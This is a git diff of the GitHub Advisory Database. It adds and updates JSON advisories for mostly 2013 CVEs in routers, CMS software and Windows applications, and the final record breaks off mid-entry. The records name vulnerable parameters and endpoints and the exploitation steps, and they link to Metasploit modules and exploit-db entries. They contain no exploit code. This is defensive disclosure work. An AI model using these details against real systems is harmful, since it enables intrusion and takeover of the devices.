b/advisories/unreviewed/2025/08/GHSA-8w5w-66j4-p452/GHSA-8w5w-66j4-p452.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8w5w-66j4-p452", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10057" + ], + "details": "A stack-based buffer overflow vulnerability exists in Synactis PDF In-The-Box ActiveX control (PDF_IN_1.ocx), specifically the ConnectToSynactis method. When a long string is passed to this method—intended to populate the ldCmdLine argument of a WinExec call—a strcpy operation overwrites a saved TRegistry class pointer on the stack. This allows remote attackers to execute arbitrary code in the context of the user by enticing them to visit a malicious webpage that instantiates the vulnerable ActiveX control. The vulnerability was discovered via its use in third-party software such as Logic Print 2013.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10057" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25835" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/35840/synactis-pdf-in-the-box-connecttosynactic-buffer-overflow" + }, + { + "type": "WEB", + "url": "https://www.synactis.com/pdf-in-the-box.htm" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/synactis-pdf-in-the-box-connectosynactic-stack-based-buffer-overflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-97gj-fw67-mjpj/GHSA-97gj-fw67-mjpj.json b/advisories/unreviewed/2025/08/GHSA-97gj-fw67-mjpj/GHSA-97gj-fw67-mjpj.json new file mode 100644 index 0000000000000..f82fffce4da62 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-97gj-fw67-mjpj/GHSA-97gj-fw67-mjpj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-97gj-fw67-mjpj", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10046" + ], + "details": "A local privilege escalation vulnerability exists in Agnitum Outpost Internet Security 8.1 that allows an unprivileged user to execute arbitrary code with SYSTEM privileges. The flaw resides in the acs.exe component, which exposes a named pipe that accepts unauthenticated commands. By exploiting a directory traversal weakness in the pipe protocol, an attacker can instruct the service to load a malicious DLL from a user-controlled location. The DLL is then executed in the context of the privileged service.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10046" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/local/agnitum_outpost_acs.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/27282" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28335" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/agnitum-outpost-internet-security-local-priv-esc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json b/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json index 43cc919f51ef6..5d2324786b7cc 100644 --- a/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json +++ b/advisories/unreviewed/2025/08/GHSA-cvrx-jhp7-38jf/GHSA-cvrx-jhp7-38jf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cvrx-jhp7-38jf", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:31:06Z", "published": "2025-08-01T18:31:19Z", "aliases": [ "CVE-2025-54564" ], "details": "uploadsm in ChargePoint Home Flex 5.5.4.13 does not validate a user-controlled string for bz2 decompression, which allows command execution as the nobody user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T18:15:55Z" diff --git a/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json b/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json index 14d953be74e7f..2f7b198f81754 100644 --- a/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json +++ b/advisories/unreviewed/2025/08/GHSA-fmhj-j6r9-5m2p/GHSA-fmhj-j6r9-5m2p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-fmhj-j6r9-5m2p", - "modified": "2025-08-01T18:31:19Z", + "modified": "2025-08-01T21:31:06Z", "published": "2025-08-01T18:31:18Z", "aliases": [ "CVE-2025-50870" ], "details": "Institute-of-Current-Students 1.0 is vulnerable to Incorrect Access Control in the mydetailsstudent.php endpoint. The myds GET parameter accepts an email address as input and directly returns the corresponding student's personal information without validating the identity or permissions of the requesting user. This allows any authenticated or unauthenticated attacker to enumerate and retrieve sensitive student details by altering the email value in the request URL, leading to information disclosure.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-08-01T18:15:53Z" diff --git a/advisories/unreviewed/2025/08/GHSA-gfgm-2frc-x4f5/GHSA-gfgm-2frc-x4f5.json b/advisories/unreviewed/2025/08/GHSA-gfgm-2frc-x4f5/GHSA-gfgm-2frc-x4f5.json new file mode 100644 index 0000000000000..91467b50e3b2c --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gfgm-2frc-x4f5/GHSA-gfgm-2frc-x4f5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfgm-2frc-x4f5", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10044" + ], + "details": "An authenticated SQL injection vulnerability exists in OpenEMR ≤ 4.1.1 Patch 14 that allows a low-privileged attacker to extract administrator credentials and subsequently escalate privileges. Once elevated, the attacker can exploit an unrestricted file upload flaw to achieve remote code execution, resulting in full compromise of the application and its host system.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10044" + }, + { + "type": "WEB", + "url": "https://github.com/openemr/openemr" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28329" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28408" + }, + { + "type": "WEB", + "url": "https://www.open-emr.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/openemr-sqli-priv-esc-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-gg53-3xxr-77gw/GHSA-gg53-3xxr-77gw.json b/advisories/unreviewed/2025/08/GHSA-gg53-3xxr-77gw/GHSA-gg53-3xxr-77gw.json new file mode 100644 index 0000000000000..47ca7d3e00bba --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gg53-3xxr-77gw/GHSA-gg53-3xxr-77gw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gg53-3xxr-77gw", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10058" + ], + "details": "An authenticated OS command injection vulnerability exists in various Linksys router models (tested on WRT160Nv2) running firmware version v2.0.03 via the apply.cgi endpoint. The web interface fails to properly sanitize user-supplied input passed to the ping_size parameter during diagnostic operations. An attacker with valid credentials can inject arbitrary shell commands, enabling remote code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10058" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/linksys_wrt160nv2_apply_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140830181242/http://www.s3cur1ty.de/m1adv2013-012" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24478" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25608" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/linksys-legacy-routers-remote-command-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-gwv8-67p9-8v37/GHSA-gwv8-67p9-8v37.json b/advisories/unreviewed/2025/08/GHSA-gwv8-67p9-8v37/GHSA-gwv8-67p9-8v37.json new file mode 100644 index 0000000000000..b3bc20a47c02a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gwv8-67p9-8v37/GHSA-gwv8-67p9-8v37.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwv8-67p9-8v37", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10055" + ], + "details": "An unauthenticated arbitrary file upload vulnerability exists in Havalite CMS version 1.1.7 (and possibly earlier) in the upload.php script. The application fails to enforce proper file extension validation and authentication checks, allowing remote attackers to upload malicious PHP files via a crafted multipart/form-data POST request. Once uploaded, the attacker can access the file directly under havalite/tmp/files/, resulting in remote code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10055" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/havalite_upload_exec.rb" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/havalite" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/26243" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/havalite-cms-arbitary-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-h72m-m9r4-r78c/GHSA-h72m-m9r4-r78c.json b/advisories/unreviewed/2025/08/GHSA-h72m-m9r4-r78c/GHSA-h72m-m9r4-r78c.json new file mode 100644 index 0000000000000..9bbd5d1a5602a --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-h72m-m9r4-r78c/GHSA-h72m-m9r4-r78c.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h72m-m9r4-r78c", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10063" + ], + "details": "A path traversal vulnerability exists in the Netgear SPH200D Skype phone firmware versions <= 1.0.4.80 in its embedded web server. Authenticated attackers can exploit crafted GET requests to access arbitrary files outside the web root by injecting traversal sequences. This can expose sensitive system files and configuration data.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10063" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20130207034706/http://www.s3cur1ty.de/m1adv2013-002" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24441" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netgear-sph200d-path-traversal-via-http-get" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-jr9p-69mv-mf2m/GHSA-jr9p-69mv-mf2m.json b/advisories/unreviewed/2025/08/GHSA-jr9p-69mv-mf2m/GHSA-jr9p-69mv-mf2m.json new file mode 100644 index 0000000000000..7434b16ea04ad --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-jr9p-69mv-mf2m/GHSA-jr9p-69mv-mf2m.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr9p-69mv-mf2m", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10061" + ], + "details": "An authenticated OS command injection vulnerability exists in Netgear routers (tested on the DGN1000B model firmware versions 1.1.00.24 and 1.1.00.45) via the TimeToLive parameter in the setup.cgi endpoint. The vulnerability arises from improper input neutralization, enabling command injection through crafted POST requests. This flaw enables remote attackers to deploy payloads or manipulate system state post-authentication.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10061" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/netgear_dgn1000b_setup_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150218074318/http://www.s3cur1ty.de/m1adv2013-005" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24464" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24931" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netgear-legacy-routers-rce-2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mgp2-v3xv-x9v3/GHSA-mgp2-v3xv-x9v3.json b/advisories/unreviewed/2025/08/GHSA-mgp2-v3xv-x9v3/GHSA-mgp2-v3xv-x9v3.json new file mode 100644 index 0000000000000..922590bbb2239 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mgp2-v3xv-x9v3/GHSA-mgp2-v3xv-x9v3.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgp2-v3xv-x9v3", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10047" + ], + "details": "An unrestricted file upload vulnerability exists in MiniWeb HTTP Server <= Build 300 that allows unauthenticated remote attackers to upload arbitrary files to the server’s filesystem. By abusing the upload handler and crafting a traversal path, an attacker can place a malicious .exe in system32, followed by a .mof file in the WMI directory. This triggers execution of the payload with SYSTEM privileges via the Windows Management Instrumentation service. The exploit is only viable on Windows versions prior to Vista.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10047" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/miniweb_upload_wbem.rb" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/miniweb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/27607" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/miniweb-arbitrary-file-upload" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-vv4j-q4m2-9gr7/GHSA-vv4j-q4m2-9gr7.json b/advisories/unreviewed/2025/08/GHSA-vv4j-q4m2-9gr7/GHSA-vv4j-q4m2-9gr7.json new file mode 100644 index 0000000000000..a305ea7bf4999 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-vv4j-q4m2-9gr7/GHSA-vv4j-q4m2-9gr7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv4j-q4m2-9gr7", + "modified": "2025-08-01T21:31:06Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10051" + ], + "details": "A remote PHP code execution vulnerability exists in InstantCMS version 1.6 and earlier due to unsafe use of eval() within the search view handler. Specifically, user-supplied input passed via the look parameter is concatenated into a PHP expression and executed without proper sanitation. A remote attacker can exploit this flaw by sending a crafted HTTP GET request with a base64-encoded payload in the Cmd header, resulting in arbitrary PHP code execution within the context of the web server.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10051" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/122176" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/instantcms_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/26622" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/instantcms-remote-php-code-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-95" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-w7gc-gxjh-pg78/GHSA-w7gc-gxjh-pg78.json b/advisories/unreviewed/2025/08/GHSA-w7gc-gxjh-pg78/GHSA-w7gc-gxjh-pg78.json new file mode 100644 index 0000000000000..680027745c6b0 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-w7gc-gxjh-pg78/GHSA-w7gc-gxjh-pg78.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7gc-gxjh-pg78", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:06Z", + "aliases": [ + "CVE-2013-10048" + ], + "details": "An OS command injection vulnerability exists in various legacy D-Link routers—including DIR-300 rev B and DIR-600 (firmware ≤ 2.13 and ≤ 2.14b01, respectively)—due to improper input handling in the unauthenticated command.php endpoint. By sending specially crafted POST requests, a remote attacker can execute arbitrary shell commands with root privileges, allowing full takeover of the device. This includes launching services such as Telnet, exfiltrating credentials, modifying system configuration, and disrupting availability. The flaw stems from the lack of authentication and inadequate sanitation of the cmd parameter.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10048" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20131022221648/http://www.s3cur1ty.de/m1adv2013-003" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/24453" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/27528" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/d-link-legacy-unauth-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xcrc-5423-m358/GHSA-xcrc-5423-m358.json b/advisories/unreviewed/2025/08/GHSA-xcrc-5423-m358/GHSA-xcrc-5423-m358.json new file mode 100644 index 0000000000000..ac055e906cabc --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xcrc-5423-m358/GHSA-xcrc-5423-m358.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xcrc-5423-m358", + "modified": "2025-08-01T21:31:07Z", + "published": "2025-08-01T21:31:07Z", + "aliases": [ + "CVE-2013-10053" + ], + "details": "A remote command execution vulnerability exists in ZPanel version 10.0.0.2 in its htpasswd module. When creating .htaccess files, the inHTUsername field is passed unsanitized to a system() call that invokes the system’s htpasswd binary. By injecting shell metacharacters into the username field, an authenticated attacker can execute arbitrary system commands. Exploitation requires a valid ZPanel account—such as one in the default Users, Resellers, or Administrators groups—but no elevated privileges.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10053" + }, + { + "type": "WEB", + "url": "https://github.com/zpanel/zpanelx" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/zpanel_username_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20130617014355/http://forums.zpanelcp.com/showthread.php?27898-Serious-Remote-Execution-Exploit-in-Zpanel-10-0-0-2" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/zpanel-htpasswd-module-username-command-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-01T21:15:27Z" + } +} \ No newline at end of file From 178d7b8fbbf780533bab4cf45a875269c9277631 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 2 Aug 2025 00:32:47 +0000 Subject: [PATCH 308/323] Publish Advisories GHSA-h28c-39h5-c348 GHSA-jrvp-6f3w-jhh7 GHSA-vwv7-36jv-h55v GHSA-p48p-6mxj-w7jx --- .../GHSA-h28c-39h5-c348.json | 6 +- .../GHSA-jrvp-6f3w-jhh7.json | 3 +- .../GHSA-vwv7-36jv-h55v.json | 9 ++- .../GHSA-p48p-6mxj-w7jx.json | 64 +++++++++++++++++++ 4 files changed, 78 insertions(+), 4 deletions(-) create mode 100644 advisories/unreviewed/2025/08/GHSA-p48p-6mxj-w7jx/GHSA-p48p-6mxj-w7jx.json diff --git a/advisories/unreviewed/2025/05/GHSA-h28c-39h5-c348/GHSA-h28c-39h5-c348.json b/advisories/unreviewed/2025/05/GHSA-h28c-39h5-c348/GHSA-h28c-39h5-c348.json index 3342623d72d6a..6cbed91fcf3b1 100644 --- a/advisories/unreviewed/2025/05/GHSA-h28c-39h5-c348/GHSA-h28c-39h5-c348.json +++ b/advisories/unreviewed/2025/05/GHSA-h28c-39h5-c348/GHSA-h28c-39h5-c348.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h28c-39h5-c348", - "modified": "2025-05-05T18:32:53Z", + "modified": "2025-08-02T00:31:08Z", "published": "2025-05-05T18:32:53Z", "aliases": [ "CVE-2025-0217" ], "details": "BeyondTrust Privileged Remote Access (PRA) versions prior to 25.1 are vulnerable to a local authentication bypass. A local authenticated attacker can view the connection details of a ShellJump session that was initiated with external tools, allowing unauthorized access to connected sessions.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/06/GHSA-jrvp-6f3w-jhh7/GHSA-jrvp-6f3w-jhh7.json b/advisories/unreviewed/2025/06/GHSA-jrvp-6f3w-jhh7/GHSA-jrvp-6f3w-jhh7.json index 9e6986f76796b..2ba345d606c00 100644 --- a/advisories/unreviewed/2025/06/GHSA-jrvp-6f3w-jhh7/GHSA-jrvp-6f3w-jhh7.json +++ b/advisories/unreviewed/2025/06/GHSA-jrvp-6f3w-jhh7/GHSA-jrvp-6f3w-jhh7.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + 